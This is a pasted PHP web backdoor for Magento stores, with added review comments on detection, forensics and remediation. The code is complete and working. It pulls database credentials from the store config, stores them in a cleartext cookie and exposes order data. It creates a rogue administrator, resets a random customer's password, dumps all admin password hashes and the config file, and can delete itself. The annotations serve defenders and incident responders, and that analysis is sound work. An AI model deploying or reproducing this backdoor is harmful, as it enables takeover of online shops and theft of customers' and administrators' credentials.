
Untitled

a guest
Aug 20th, 2019
  1. <?php
  // NOTE(review): Standalone database-access backdoor targeting Magento 1.x / 2.x stores.
  // Nothing in this run authenticates the caller: anyone who can request the file reaches
  // the connection logic below. Credentials come from one of three sources, tried in order:
  //   1. POSTed form fields (button `btn_c`),
  //   2. the `h_c` cookie set by an earlier successful connect,
  //   3. the store's own config file, parsed by load_xml().
  // Detection: a request cookie named `h_c` holding five pipe-delimited fields
  // (host|user|password|db|prefix) is a strong indicator in web/WAF logs. The HTML banner that
  // follows this run also echoes user:password@host/db in cleartext, and the page title is
  // "Forbidden".
  // Response: once this file is found on a host, treat the database credentials in the store
  // config as exposed and rotate them.
  2. $conn = false;
  3. $connd = array('h'=>'', 'u'=>'', 'p'=>'', 'd'=>'', 'r'=>'');
  4. $isM2 = false;
  5.  
  // get_magento_path() also sets the global $isM2 as a side effect (true when env.php is found).
  6. $path = get_magento_path();
  7.  
  8.  
  9. $isMysqli = function_exists('mysqli_connect');
  10. $connResult = '';
  11. if(isset($_POST['btn_c'])) {
  // `@` hides the notice raised when a field is missing from the POST body.
  12. $connd['h'] = @$_POST['h'];
  13. $connd['u'] = @$_POST['u'];
  14. $connd['p'] = @$_POST['p'];
  15. $connd['d'] = @$_POST['d'];
  16. $connd['r'] = @$_POST['r'];
  17. $conn = sql_conn($connd);
  18. if($conn!==false) {
  // Stores the database password in a client-side cookie in cleartext. setcookie() is called
  // with name and value only, so no expiry, path, Secure or HttpOnly attributes are supplied.
  19. setcookie('h_c' , $connd['h'].'|'.$connd['u'].'|'.$connd['p'].'|'.$connd['d'].'|'.$connd['r']);
  20. $connResult = 'Connect ok!<br>';
  21. } else {
  22. $connResult = 'Test connection error! ERR:'.sql_conn_error().'<br>';
  23. }
  24. } elseif(isset($_COOKIE['h_c'])) {
  // The cookie value is trusted as-is; fewer than five fields leaves the later list() slots unset.
  25. list($connd['h'], $connd['u'], $connd['p'], $connd['d'], $connd['r']) = explode('|', $_COOKIE['h_c']);
  26. $conn = sql_conn($connd);
  27. } else {
  // No operator input at all: fall back to the credentials stored in the store's config file.
  28. $c = load_xml();
  29. if($c!==false) {
  30. $connd = $c;
  31. $conn = sql_conn($connd);
  32. }
  33. }
  34.  
  35. ?>
  36. <html>
  37. <head>
  38. <title>Forbidden</title>
  39. </head>
  40. <body>
  41. <?php if($conn) { ?>
  42. <p style="display:inline; color:green;">Connected</p> to <?php echo $connd['u'].':'.$connd['p'].'@'.$connd['h'].'/'.$connd['d'].($connd['r']!='' ? ' ('.$connd['r'].')':'').' via '.($isMysqli ? 'MySQLi':'MySQL').' ('.($isM2 ? 'M2' : 'M1').')'; ?>
  43. <?php } else { ?>
  44. <p style="display:inline; color:red;">Not connected</p>
  45. <?php } ?>
  46. <hr>
  47. [<a href="?a=c">Connection</a>] [<a href="?a=o">Orders</a>] [<a href="?a=a">Add admin</a>] [<a href="?a=l">Admin list</a>] [<a href="?a=u">Change user</a>] [<a href="?a=x">local.xml</a>] [<a href="?a=p">Dump</a>] [<a href="?a=d">Delete</a>]<br>
  48. <hr>
  49. <?php
  50.  
  // Action dispatcher. Without a live connection the only reachable view is the connection
  // form ('c'); otherwise the single-letter `a` query parameter selects the view. There is no
  // default case, so an unknown value renders nothing below the menu.
  // Detection: access-log entries for one script with `?a=` followed by c, o, a, l, u, x, p or d
  // match the menu links emitted in the HTML above.
  51. if(!$conn)
  52. $act = 'c';
  53. else
  54. $act = @$_GET['a'];
  55.  
  56. switch($act) {
  57. case 'c':
  58. show_c();
  59. break;
  60. case 'a':
  61. show_a();
  62. break;
  63. case 'u':
  64. show_u();
  65. break;
  66. case 'o':
  67. show_o();
  68. break;
  69. case 'l':
  70. show_l();
  71. break;
  72. case 'x':
  73. show_x();
  74. break;
  75. case 'p':
  76. show_p();
  77. break;
  78. case 'd':
  // Self-removal: the script unlinks its own file and reports whether it is gone.
  // Forensics: absence of the file on disk does not mean it was never there; web server
  // access logs (a request with `a=d`) and backups/file-integrity baselines are the remaining
  // evidence.
  79. $unlink = unlink(__FILE__);
  // clearstatcache() so the file_exists() check below is not answered from PHP's stat cache.
  80. clearstatcache();
  81. $exists = file_exists(__FILE__);
  82. echo "Unlink: <b style='color: ".($unlink===true ? 'green' : 'red')."'>".var_export($unlink, true)."</b><br>\n";
  83. echo "File exists: <b style='color: ".($exists===false ? 'green' : 'red')."'>".var_export($exists, true)."</b>\n";
  84. break;
  85. }
  86.  
  87. ?>
  88.  
  89. </body>
  90. </html>
  91. <?php
  /**
   * Orders view: prints order counts for the last 1, 7 and 30 days, then a table of the most
   * recent orders with their payment method and the configured title of that method.
   *
   * Reads only; nothing is written to the database here. The table name depends on $isM2
   * (`sales_order` for M2, `sales_flat_order` for M1), prefixed with $connd['r'].
   *
   * Detection: database query logs showing three consecutive COUNT(*) queries over the order
   * table with DATE_SUB(now(), INTERVAL 1/7/30 DAY), followed by per-order lookups in the
   * payment table and `core_config_data`, match this function.
   */
  92. function show_o() {
  93. global $connd, $isM2;
  // `limit` is taken from GET, POST or cookies; intval() keeps it numeric before it is
  // concatenated into the LIMIT clause. A negative value is not rejected.
  94. if(isset($_REQUEST['limit'])) {
  95. $limit = intval($_REQUEST['limit']);
  96. } else {
  97. $limit = 100;
  98. }
  99.  
  100. if($isM2) {
  101.  
  102. $q = sql_query("SELECT count(*) as total FROM `{$connd['r']}sales_order` WHERE created_at > DATE_SUB(now(), INTERVAL 1 DAY) ");
  103. $t1 = sql_array($q);
  104. $q = sql_query("SELECT count(*) as total FROM `{$connd['r']}sales_order` WHERE created_at > DATE_SUB(now(), INTERVAL 7 DAY) ");
  105. $t7 = sql_array($q);
  106. $q = sql_query("SELECT count(*) as total FROM `{$connd['r']}sales_order` WHERE created_at > DATE_SUB(now(), INTERVAL 30 DAY) ");
  107. $t30 = sql_array($q);
  108. } else {
  109. $q = sql_query("SELECT count(*) as total FROM `{$connd['r']}sales_flat_order` WHERE created_at > DATE_SUB(now(), INTERVAL 1 DAY) ");
  110. $t1 = sql_array($q);
  111. $q = sql_query("SELECT count(*) as total FROM `{$connd['r']}sales_flat_order` WHERE created_at > DATE_SUB(now(), INTERVAL 7 DAY) ");
  112. $t7 = sql_array($q);
  113. $q = sql_query("SELECT count(*) as total FROM `{$connd['r']}sales_flat_order` WHERE created_at > DATE_SUB(now(), INTERVAL 30 DAY) ");
  114. $t30 = sql_array($q);
  115. }
  116.  
  // NOTE(review): the four labels in this format string are mis-encoded in the paste
  // (presumably non-ASCII text in the original file); the literal is left as found.
  117. printf('<b>?003f?003f003f003c/b>: %d <b>?003f?003f003f</b>: %d <b>?003f?003f003f003c/b>: %d | <b>?003f?003f003f</b>: %d (?limit=%d)<br>', $t1['total'], $t7['total'], $t30['total'], $limit, $limit);
  118. if($isM2) {
  119. $q = sql_query("SELECT * FROM `{$connd['r']}sales_order` ORDER BY `created_at` DESC LIMIT ".$limit);
  120. } else {
  121. $q = sql_query("SELECT * FROM `{$connd['r']}sales_flat_order` ORDER BY `created_at` DESC LIMIT ".$limit);
  122. }
  123. echo '<table border=1><tr><th>ID</th><th>Date</th><th>Amount</th><th>Pay</th></tr>';
  // Two extra queries are issued per order row; values read from the database are
  // interpolated into the follow-up SQL and into the HTML without escaping.
  124. while($o = sql_array($q)) {
  125. if($isM2) {
  126. $qq = sql_query("SELECT `method` FROM `{$connd['r']}sales_order_payment` WHERE `entity_id` = {$o['entity_id']} LIMIT 1");
  127.  
  128. } else {
  129. $qq = sql_query("SELECT `method` FROM `{$connd['r']}sales_flat_order_payment` WHERE `entity_id` = {$o['entity_id']} LIMIT 1");
  130. }
  131. $p = sql_array($qq);
  132.  
  133. $qqq = sql_query( "SELECT `value` FROM `{$connd['r']}core_config_data` WHERE `path` = 'payment/{$p['method']}/title' AND `value` != '' LIMIT 1");
  134. $pt = sql_array($qqq);
  135. echo "<tr><td>#{$o['increment_id']}</td><td>{$o['created_at']}</td><td>{$o['base_subtotal_incl_tax']}</td><td>{$p['method']}({$pt['value']})</td></tr>";
  136.  
  137. }
  138. echo '</table>';
  139. }
  /**
   * "Change user" view: on POST (`btn_uc`), selects one customer at random and overwrites that
   * customer's stored password hash with one derived from the submitted `p` field, then prints
   * the customer's ID, e-mail and the new password in cleartext. Always renders the form.
   *
   * Hash written: md5('ab' . p) followed by ":ab" into `customer_entity_varchar` (attribute
   * `password_hash`, entity_type_id 1), and, when $isM2 is true, additionally
   * md5('ab' . p) followed by ":ab:0" into `customer_entity.password_hash`.
   *
   * Detection: the salt is the fixed string 'ab', so a customer password value ending in
   * ":ab" or ":ab:0" is an indicator of this tool. Customers who report a password that
   * stopped working around the same time as requests to this script are likely affected.
   * Remediation for affected accounts is a forced password reset.
   */
  140. function show_u() {
  141. global $connd,$isM2;
  142. if(isset($_POST['btn_uc'])) {
  143. $p = @$_POST['p'];
  144. $salt = 'ab';
  145.  
  // ORDER BY RAND() LIMIT 1: the affected account is arbitrary, not chosen by the caller.
  146. $q = sql_query("SELECT `entity_id`,`email` FROM `{$connd['r']}customer_entity` ORDER BY RAND() LIMIT 1");
  147. $u = sql_array($q);
  148. if(!is_array($u) || $u['entity_id']=='') {
  149. echo 'Customer search error: '.sql_error().'<br>';
  150. } else {
  // The result of this UPDATE is not checked; the success message below depends only on the
  // INSERT that follows, which runs for both M1 and M2.
  151. if($isM2) {
  152. sql_query("UPDATE `{$connd['r']}customer_entity` SET password_hash = '".md5($salt.$p).":{$salt}:0' WHERE entity_id = {$u['entity_id']}");
  153. }
  // $p reaches the SQL only as an md5() hex digest; it is echoed raw into the HTML further down.
  154. if(sql_query("INSERT INTO `{$connd['r']}customer_entity_varchar` (value_id, attribute_id, entity_id, value) VALUES(null, (select attribute_id from `{$connd['r']}eav_attribute` where attribute_code='password_hash' and entity_type_id=1 LIMIT 1), {$u['entity_id']}, '".md5($salt.$p).":{$salt}') ON DUPLICATE KEY UPDATE value='".md5($salt.$p).":{$salt}'")) {
  155. echo 'Update ok!<br>';
  156. echo 'ID: '.$u['entity_id'].'<br>';
  157. echo 'Email: '.$u['email'].'<br>';
  158. echo 'Pass: '.$p.'<br>';
  159. } else {
  160. echo 'Customer update error: '.sql_error().'<br>';
  161. }
  162. }
  163. }
  164. echo '<form method="POST">
  165. Pass: <input type="text" name="p"><br>
  166. <input type="submit" name="btn_uc" value="Change password">
  167. </form>';
  168. }
  /**
   * "Add admin" view: on POST (`btn_aa`), inserts a row into `admin_user` and then a role row
   * (`authorization_role` for M2, `admin_role` for M1) that attaches the new user under
   * parent role id 1. Always renders the form.
   *
   * Password value written: sha256('ab' . p) followed by ":ab:1" for M2, md5('ab' . p)
   * followed by ":ab" for M1. The name, e-mail and login fields pass through sql_escape().
   *
   * Detection: audit `admin_user` for rows whose `password` ends in ":ab" or ":ab:1" (the salt
   * is the fixed string 'ab'), and the role table for role_type 'U' rows with parent_id 1 that
   * point at an unrecognised user_id. The two inserts are not wrapped in a transaction, so an
   * `admin_user` row with no matching role row can be left behind when the second insert fails.
   */
  169. function show_a() {
  170. global $connd,$isM2;
  171. if(isset($_POST['btn_aa'])) {
  172. $salt = 'ab';
  173. if($isM2) {
  174. $q1 = "INSERT INTO `{$connd['r']}admin_user` (`firstname`,`lastname`,`email`,`username`,`password`) VALUES ('".sql_escape(@$_POST['f'])."','".sql_escape(@$_POST['l'])."','".sql_escape(@$_POST['e'])."','".sql_escape(@$_POST['u'])."','".hash('sha256', $salt.@$_POST['p']).":{$salt}:1')";
  175. } else {
  176. $q1 = "INSERT INTO `{$connd['r']}admin_user` (`firstname`,`lastname`,`email`,`username`,`password`) VALUES ('".sql_escape(@$_POST['f'])."','".sql_escape(@$_POST['l'])."','".sql_escape(@$_POST['e'])."','".sql_escape(@$_POST['u'])."','".md5($salt.@$_POST['p']).":{$salt}')";
  177. }
  178. if(sql_query($q1)) {
  // sql_id() supplies the auto-increment id of the admin_user row inserted just above.
  179. if($isM2) {
  180. $q2 = "INSERT INTO `{$connd['r']}authorization_role` (`role_id`,`parent_id`,`tree_level`,`sort_order`,`role_type`,`user_id`,`role_name`,`user_type`) VALUES (null, 1, 2, 0, 'U', ".sql_id().", '".sql_escape(@$_POST['u'])."', 2)";
  181. } else {
  182. $q2 = "INSERT INTO `{$connd['r']}admin_role` (`role_id`,`parent_id`,`tree_level`,`sort_order`,`role_type`,`user_id`,`role_name`) VALUES (null, 1, 2, 0, 'U', ".sql_id().", '".sql_escape(@$_POST['u'])."')";
  183. }
  184. if(sql_query($q2))
  185. echo "Added admin!<br>";
  186. else
  187. echo "Error when adding admin role: ".sql_error()."<br>";
  188.  
  189.  
  190. } else
  191. echo "Error when adding admin: ".sql_error()."<br>";
  192. }
  193.  
  194. echo '<form method="POST">
  195. First:<input type="text" name="f"><br>
  196. Last:<input type="text" name="l"><br>
  197. Email:<input type="text" name="e"><br>
  198. Login:<input type="text" name="u"><br>
  199. Pass:<input type="text" name="p"><br>
  200. <input type="submit" name="btn_aa" value="Add">
  201. </form>';
  202. }
  /**
   * Connection view: prints the result of the last connect attempt (if any) and a form
   * pre-filled with the current host, user, password, database and table prefix.
   *
   * The "Load xml" button (`btn_l`) replaces the global $connd with the credentials parsed
   * from the store config by load_xml(); it does not reconnect by itself.
   *
   * The database password is written into the HTML response in a plain text input, and the
   * values are placed in the `value` attributes without HTML escaping.
   */
  203. function show_c() {
  204. global $connd, $connResult;
  205. if(isset($_POST['btn_l'])) {
  206. $c = load_xml();
  207. if($c===false)
  208. echo 'Cannot find xml!<br>';
  209. else
  210. $connd = $c;
  211. }
  212. if($connResult!='') {
  213. echo $connResult;
  214. }
  215. echo '<form method="POST">
  216. Host: <input type="text" name="h" value="'.$connd['h'].'"><br>
  217. User: <input type="text" name="u" value="'.$connd['u'].'"><br>
  218. Pass: <input type="text" name="p" value="'.$connd['p'].'"><br>
  219. DB: <input type="text" name="d" value="'.$connd['d'].'"><br>
  220. Prefix: <input type="text" name="r" value="'.$connd['r'].'"><br>
  221. <input type="submit" name="btn_c" value="Save"><input type="submit" name="btn_l" value="Load xml">
  222. </form>';
  223. }
  /**
   * Admin list view: reads every row of `admin_user` and prints it three ways: an HTML table,
   * a `username:password-hash` list (CRLF-separated), and a slash-delimited dump with a header.
   *
   * Impact: all back-office password hashes leave the database in the HTTP response. After
   * finding this script, treat every admin credential as exposed and reset them.
   *
   * Detection: the literal header
   * `user_id/firstname/lastname/username/email/password/logdate/is_active` in a response body
   * is specific to this tool. Table cells are echoed without HTML escaping; only the two
   * textareas go through htmlspecialchars().
   */
  224. function show_l() {
  225. global $connd;
  226.  
  227. $q = sql_query("SELECT * FROM `{$connd['r']}admin_user` ORDER BY `user_id` ASC");
  228.  
  229. echo '<table border=1><tr><th>ID</th><th>Name</th><th>Login</th><th>Email</th><th>Password</th><th>Log date</th></tr>';
  230. $outStr = '';
  231. $dumpStr = 'user_id/firstname/lastname/username/email/password/logdate/is_active'."\n";
  232. while($item = sql_array($q)) {
  233. $outStr .= $item['username'].':'.$item['password']."\r\n";
  234. $dumpStr .= $item['user_id'].'/'.$item['firstname'].'/'.$item['lastname'].'/'.$item['username'].'/'.$item['email'].'/'.$item['password'].'/'.$item['logdate'].'/'.$item['is_active']."\n";
  235. echo '<tr><td>'.$item['user_id'].'</td><td>'.$item['firstname'].' '.$item['lastname'].'</td><td>'.$item['username'].'</td><td>'.$item['email'].'</td><td>'.$item['password'].'</td><td>'.$item['logdate'].' ('.$item['is_active'].')</td></tr>';
  236. }
  237. echo '</table>';
  238. echo '<textarea cols=100 rows=20>'.htmlspecialchars($outStr).'</textarea><br>';
  239. echo '<textarea cols=100 rows=20>'.htmlspecialchars($dumpStr).'</textarea>';
  240. }
  /**
   * Config view: prints the path and full contents of the store's configuration file,
   * `app/etc/env.php` for M2 or `app/etc/local.xml` for M1, inside an escaped textarea.
   *
   * These are the files load_xml() parses for database credentials, so everything in them is
   * disclosed to whoever requests this view. NOTE(review): a standard Magento config also
   * holds the encryption key; confirm and rotate it together with the DB password.
   */
  241. function show_x() {
  242. global $isM2;
  // For M2, get_xml() include()s env.php; the returned value is not used in that branch
  // because the file is read again as text below.
  243. $xml = get_xml();
  244. if($isM2) {
  245. echo "Path: <b>".get_magento_path()."/app/etc/env.php</b><br>";
  246. echo '<textarea cols=100 rows=20>'.htmlspecialchars(file_get_contents(get_magento_path()."/app/etc/env.php")).'</textarea>';
  247. } else {
  248. echo "Path: <b>".get_magento_path()."/app/etc/local.xml</b><br>";
  249. echo '<textarea cols=100 rows=20>'.htmlspecialchars($xml).'</textarea>';
  250. }
  251. }
  252.  
  /**
   * Dump view: assembles one tagged text report about the store and prints it in a textarea.
   *
   * The report holds the platform label ("[PHP] Magento 1.x" / "[PHP] Magento 2.x"), the
   * install path, the 30-day order count, the full admin-user dump from getAdminsRaw(), and
   * the raw contents of the config file (env.php or local.xml).
   *
   * Detection: the tag names `h_engine_name`, `h_engine_path`, `h_ordes_count_m` (spelled as
   * in the code), `h_admins_list` and `h_config_local_xml` are specific strings to search for
   * in response bodies, proxy captures or stolen-data samples. Values are concatenated without
   * XML escaping, so the report is not guaranteed to be well-formed XML.
   */
  253. function show_p() {
  254. global $connd;
  255. global $isM2;
  256.  
  257. if($isM2)
  258. $q = sql_query("SELECT count(*) as total FROM `{$connd['r']}sales_order` WHERE created_at > DATE_SUB(now(), INTERVAL 30 DAY) ");
  259. else
  260. $q = sql_query("SELECT count(*) as total FROM `{$connd['r']}sales_flat_order` WHERE created_at > DATE_SUB(now(), INTERVAL 30 DAY) ");
  261.  
  262. $t30 = sql_array($q);
  263.  
  264. $xml = '';
  265. if($isM2) {
  266. $xml .= "<h_engine_name>[PHP] Magento 2.x</h_engine_name>\n";
  267. } else {
  268. $xml .= "<h_engine_name>[PHP] Magento 1.x</h_engine_name>\n";
  269. }
  270.  
  271. $xml .= "<h_engine_path>".get_magento_path()."</h_engine_path>\n";
  272. $xml .= "<h_ordes_count_m>".$t30['total']."</h_ordes_count_m>\n";
  273. $xml .= "<h_admins_list>".getAdminsRaw()."</h_admins_list>\n";
  274.  
  // M2 reads env.php as text here; get_xml() would include() it and return its value instead.
  275. if($isM2) {
  276. $xml .= "<h_config_local_xml>".file_get_contents(get_magento_path()."/app/etc/env.php")."</h_config_local_xml>";
  277. } else {
  278. $xml .= "<h_config_local_xml>".get_xml()."</h_config_local_xml>";
  279. }
  280.  
  281. echo '<textarea cols=100 rows=20>'.htmlspecialchars($xml).'</textarea>';
  282. }
  283.  
  284.  
  285.  
  286.  
  /**
   * Extracts the store's database credentials from its configuration file.
   *
   * Returns an array with keys 'h' (host), 'u' (username), 'p' (password), 'd' (database name)
   * and 'r' (table prefix), or false when get_xml() returned false.
   *
   * M2: reads db.connection.default.* and db.table_prefix from the array returned by env.php.
   * M1: strips XML comments from local.xml, then pulls each value out of its CDATA section
   * with a regular expression. The match results are not checked, so a tag that is absent or
   * not CDATA-wrapped leaves the corresponding $m*[1] undefined.
   *
   * Defensive note: the web server user being able to read these files is what lets a dropped
   * script obtain database access with no credentials of its own.
   */
  287. function load_xml() {
  288. global $isM2;
  289. $xml = get_xml();
  290.  
  291. if($xml!==false) {
  292. if($isM2) {
  293. return array('h'=>$xml['db']['connection']['default']['host'], 'u'=>$xml['db']['connection']['default']['username'], 'p'=>$xml['db']['connection']['default']['password'],'d'=>$xml['db']['connection']['default']['dbname'],'r'=>$xml['db']['connection']['table_prefix']);
  294. } else {
  // Comments are removed first so that commented-out connection blocks are not matched.
  295. $xml = preg_replace('/<!--(.*?)-->/is', '', $xml);
  296. preg_match('/<host><!\[CDATA\[(.*?)\]\]><\/host>/i', $xml, $m1);
  297. preg_match('/<username><!\[CDATA\[(.*?)\]\]><\/username>/i', $xml, $m2);
  298. preg_match('/<password><!\[CDATA\[(.*?)\]\]><\/password>/i', $xml, $m3);
  299. preg_match('/<dbname><!\[CDATA\[(.*?)\]\]><\/dbname>/i', $xml, $m4);
  300. preg_match('/<table_prefix><!\[CDATA\[(.*?)\]\]><\/table_prefix>/i', $xml, $m5);
  301.  
  302. return array('h'=>$m1[1], 'u'=>$m2[1], 'p'=>$m3[1],'d'=>$m4[1],'r'=>$m5[1]);
  303. }
  304.  
  305. }
  306.  
  307. return false;
  308. }
  309.  
  /**
   * Returns every `admin_user` row as slash-delimited text, one row per line, preceded by the
   * header `user_id/firstname/lastname/username/email/password/logdate/is_active`.
   *
   * The `password` column (the stored hash) is included. Field values are not escaped, so a
   * value containing "/" or a newline makes the output ambiguous.
   */
  310. function getAdminsRaw() {
  311. global $connd;
  312. $q = sql_query("SELECT * FROM `{$connd['r']}admin_user` ORDER BY `user_id` ASC");
  313.  
  314. $dumpStr = 'user_id/firstname/lastname/username/email/password/logdate/is_active'."\n";
  315. while($item = sql_array($q)) {
  316. $dumpStr .= $item['user_id'].'/'.$item['firstname'].'/'.$item['lastname'].'/'.$item['username'].'/'.$item['email'].'/'.$item['password'].'/'.$item['logdate'].'/'.$item['is_active']."\n";
  317. }
  318.  
  319. return $dumpStr;
  320. }
  321.  
  /**
   * Loads the store configuration. The return type differs by platform:
   * M2 - include()s app/etc/env.php and returns whatever that file returns;
   * M1 - returns the text of app/etc/local.xml, or false if file_get_contents() fails.
   *
   * NOTE(review): get_magento_path() returns false when no install is found; the path is then
   * built from an empty string, i.e. "/app/etc/..." at the filesystem root.
   */
  322. function get_xml() {
  323. global $isM2;
  324. if($isM2) {
  325. return include(get_magento_path().'/app/etc/env.php');
  326. } else {
  327. return file_get_contents(get_magento_path().'/app/etc/local.xml');
  328. }
  329.  
  330. }
  331.  
  /**
   * Locates the Magento root by probing the current working directory and up to ten parent
   * directories for `app/etc/local.xml` (M1) or `app/etc/env.php` (M2).
   *
   * Side effect: sets the global $isM2 (false for local.xml, true for env.php). At each level
   * local.xml is tested first. Returns the resolved root path, or false if neither file is
   * found within the searched levels.
   *
   * Hunting note: because the search walks upward with relative paths, the script does not
   * have to sit in the store root; any web-reachable directory up to ten levels below it
   * works, so file sweeps should cover the whole document tree.
   */
  332. function get_magento_path() {
  333. global $isM2;
  334. for($i=0;$i<=10;$i++) {
  335. if(file_exists(str_repeat('../', $i).'app/etc/local.xml')) {
  336. $isM2 = false;
  337. return realpath(str_repeat('../', $i));
  338. }
  339. if(file_exists(str_repeat('../', $i).'app/etc/env.php')) {
  340. $isM2 = true;
  341. return realpath(str_repeat('../', $i));
  342. }
  343.  
  344. }
  345.  
  346. return false;
  347. }
  348.  
  /**
   * Opens a MySQL connection with the credentials in $data (keys 'h', 'u', 'p', 'd') and sets
   * the connection charset to utf8.
   *
   * Uses mysqli when the global $isMysqli is true, otherwise the legacy mysql_* functions
   * (which no longer exist in PHP 7 and later). Returns the connection handle, or false if
   * connecting, selecting the database, or setting the charset fails.
   */
  349. function sql_conn($data) {
  350. global $isMysqli;
  351. if($isMysqli) {
  352. $c = mysqli_connect($data['h'], $data['u'], $data['p'], $data['d']);
  353. if($c===false)
  354. return false;
  355. if(!mysqli_set_charset($c, 'utf8'))
  356. return false;
  357.  
  358. } else {
  359. $c = mysql_connect($data['h'], $data['u'], $data['p']);
  360. if(!$c)
  361. return false;
  362. if(!mysql_select_db($data['d']))
  363. return false;
  364. if(!mysql_set_charset('utf8'))
  365. return false;
  366.  
  367. }
  368.  
  369. return $c;
  370. }
  371.  
  /**
   * Runs the SQL string $q on the global connection $conn via mysqli_query() or mysql_query(),
   * depending on $isMysqli, and returns that function's result.
   *
   * Every caller in this file builds $q by string concatenation; no prepared statements are
   * used anywhere in the script.
   */
  372. function sql_query($q) {
  373. global $conn, $isMysqli;
  374. if($isMysqli) {
  375. return mysqli_query($conn, $q);
  376. } else {
  377. return mysql_query($q, $conn);
  378. }
  379. }
  380.  
  /**
   * Fetches the next row of result $q with mysqli_fetch_array() or mysql_fetch_array().
   * The global $conn is declared but not used here. The result handle is not checked, so a
   * failed query (false) is passed straight to the fetch function.
   */
  381. function sql_array($q) {
  382. global $conn, $isMysqli;
  383. return $isMysqli ? mysqli_fetch_array($q) : mysql_fetch_array($q);
  384. }
  385.  
  /**
   * Returns the last error text for the global connection (mysqli_error() or mysql_error()).
   * Callers echo this string into the page, so database error details reach the HTTP response.
   */
  386. function sql_error() {
  387. global $isMysqli, $conn;
  388. return $isMysqli ? mysqli_error($conn) : mysql_error();
  389. }
  390.  
  /**
   * Escapes $str for use inside a quoted SQL string literal, using the real_escape_string
   * function of whichever MySQL extension is active. In this file it is applied only to the
   * form fields in show_a(); other interpolated values are not escaped.
   */
  391. function sql_escape($str) {
  392. global $isMysqli, $conn;
  393. return $isMysqli ? mysqli_real_escape_string($conn, $str) : mysql_real_escape_string($str);
  394. }
  395.  
  /**
   * Returns the auto-increment id generated by the last INSERT on the connection
   * (mysqli_insert_id() or mysql_insert_id()). show_a() uses it to link the role row to the
   * admin_user row it has just created.
   */
  396. function sql_id() {
  397. global $isMysqli, $conn;
  398. return $isMysqli ? mysqli_insert_id($conn) : mysql_insert_id();
  399. }
  400.  
  /**
   * Returns the error text of the last failed connection attempt (mysqli_connect_error(), or
   * mysql_error() for the legacy extension). The top-level connect logic prints it after
   * "Test connection error! ERR:".
   */
  401. function sql_conn_error() {
  402. global $isMysqli;
  403. return $isMysqli ? mysqli_connect_error() : mysql_error();
  404. }